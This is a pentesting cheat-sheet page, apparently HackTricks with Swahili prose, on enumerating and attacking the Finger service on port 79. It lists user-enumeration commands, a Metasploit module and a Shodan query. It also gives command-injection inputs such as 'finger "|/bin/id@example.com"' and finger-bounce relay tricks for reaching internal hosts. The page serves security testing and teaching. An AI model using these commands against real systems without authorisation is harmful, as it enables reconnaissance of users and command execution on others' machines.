hacktricks/src/network-services-pentesting/pentesting-finger.md

79 - Pentesting Finger

{{#include ../banners/hacktricks-training.md}}

Basic Info

Programu/huduma ya Finger inatumika kupata maelezo kuhusu watumiaji wa kompyuta. Kawaida, taarifa zinazotolewa zinajumuisha jina la kuingia la mtumiaji, jina kamili, na, katika baadhi ya matukio, maelezo ya ziada. Maelezo haya ya ziada yanaweza kujumuisha eneo la ofisi na nambari ya simu (ikiwa inapatikana), wakati mtumiaji alingia, kipindi cha kutokuwa na shughuli (wakati wa kupumzika), tukio la mwisho ambalo barua pepe ilisomwa na mtumiaji, na maudhui ya mipango na faili za mradi za mtumiaji.

Bandari ya kawaida: 79

PORT   STATE SERVICE
79/tcp open  finger

Uhesabu

Kuchukua Bango/Kuunganisha Msingi

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Uainishaji wa mtumiaji

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Mbadala yake unaweza kutumia finger-user-enum kutoka pentestmonkey, baadhi ya mifano:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap tekele script kwa kutumia scripts za default

Metasploit inatumia hila zaidi kuliko Nmap

use auxiliary/scanner/finger/finger_users

Shodan

• port:79 USER

Utekelezaji wa amri

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Tumia mfumo kama finger relay

finger user@host@victim
finger @internal@external

{{#include ../banners/hacktricks-training.md}}